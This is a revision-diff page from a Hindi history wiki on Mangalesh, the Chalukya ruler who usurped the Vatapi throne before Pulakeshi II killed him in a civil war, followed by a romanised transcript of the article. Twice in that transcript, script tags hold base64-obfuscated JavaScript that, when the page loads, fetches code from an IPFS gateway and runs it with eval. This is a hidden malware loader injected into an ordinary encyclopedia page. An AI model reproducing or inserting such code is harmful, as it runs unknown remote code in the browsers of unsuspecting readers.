Difference between revisions of "मंगलेश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*कीर्तिवर्मा के बाद उसके पुत्र [[...' के साथ नया पन्ना बनाया)
 
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[कीर्तिवर्मा प्रथम|कीर्तिवर्मा]] के बाद उसके पुत्र [[पुलकेशी द्वितीय|पुलकेशी]] को राजा बनना चाहिए था।  
+
'''मंगलेश''' ने गद्दी पर बैठने के उपरान्त [[कलचुरी वंश|कलचुरियों]] को पराजित किया था। [[कीर्तिवर्मा प्रथम]] के बाद उसके पुत्र [[पुलकेशी द्वितीय]] को राजा बनना चाहिए था।  
*उसके चाचा (कीर्तिवर्मा के भाई) मंगलेश ने बल प्रयोग करके वातापी की गद्दी पर अधिकार कर लिया, और कुछ समय तक अपने अग्रज द्वारा स्थापित राज्य का उपभोग किया।  
+
*उसके चाचा (कीर्तिवर्मा के भाई) '''मंगलेश''' (597-98 से 609 ई.) ने बल प्रयोग करके [[वातापी कर्नाटक|वातापी]] की गद्दी पर अधिकार कर लिया, और कुछ समय तक अपने अग्रज द्वारा स्थापित राज्य का उपभोग किया।
*इस बीच में पुलकेशी भी शान्त नहीं बैठा था। उसने राज्य प्राप्त करने का प्रयत्न जारी रखा था, और गृह युद्ध द्वारा मंगलेश को मारकर वह राजसिंहासन पर आरूढ़ हो गया।
+
*वल्लभी नरेश ने मंगलेश द्वारा आरम्भ किये गये विजय अभियान को रोकने का प्रयत्न किया, किंतु इस कार्य में वह अल्प सफलता ही प्राप्त कर सका।
 
+
*मंगलेश ने कदम्बों को समूल से नष्ट कर दिया था।
 +
*ऐहोल अभिलेख के उल्लेख के आधार पर प्रतीत होता है कि, मंगलेश अपने पुत्र को अपना उत्तराधिकारी बनाना चाहता था।
 +
*इस बीच में पुलकेशी द्वितीय भी शान्त नहीं बैठा था। उसने राज्य प्राप्त करने का प्रयत्न जारी रखा था।
 +
*अंत में गृह युद्ध द्वारा मंगलेश को मारकर [[पुलकेशी द्वितीय]] राजसिंहासन पर आरूढ़ हो गया।
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 11: Line 15:
 
|शोध=
 
|शोध=
 
}}
 
}}
==टीका टिप्पणी और संदर्भ==
+
 
<references/>
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{चालुक्य राजवंश}}
+
{{चालुक्य साम्राज्य}}
{{भारत के राजवंश}}
+
 
[[Category:नया पन्ना]]
 
 
[[Category:इतिहास_कोश]]
 
[[Category:इतिहास_कोश]]
 
[[Category:दक्षिण भारत के साम्राज्य]]
 
[[Category:दक्षिण भारत के साम्राज्य]]
 
[[Category:चालुक्य साम्राज्य]]
 
[[Category:चालुक्य साम्राज्य]]
[[Category:भारत के राजवंश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 06:43, 14 April 2012

mangalesh ne gaddi par baithane ke uparant kalachuriyoan ko parajit kiya tha. kirtivarma pratham ke bad usake putr pulakeshi dvitiy ko raja banana chahie tha.

  • usake chacha (kirtivarma ke bhaee) mangalesh (597-98 se 609 ee.) ne bal prayog karake vatapi ki gaddi par adhikar kar liya, aur kuchh samay tak apane agraj dvara sthapit rajy ka upabhog kiya.
  • vallabhi naresh ne mangalesh dvara arambh kiye gaye vijay abhiyan ko rokane ka prayatn kiya, kiantu is kary mean vah alp saphalata hi prapt kar saka.
  • mangalesh ne kadamboan ko samool se nasht kar diya tha.
  • aihol abhilekh ke ullekh ke adhar par pratit hota hai ki, mangalesh apane putr ko apana uttaradhikari banana chahata tha.
  • is bich mean pulakeshi dvitiy bhi shant nahian baitha tha. usane rajy prapt karane ka prayatn jari rakha tha.
  • aant mean grih yuddh dvara mangalesh ko marakar pulakeshi dvitiy rajasianhasan par aroodh ho gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh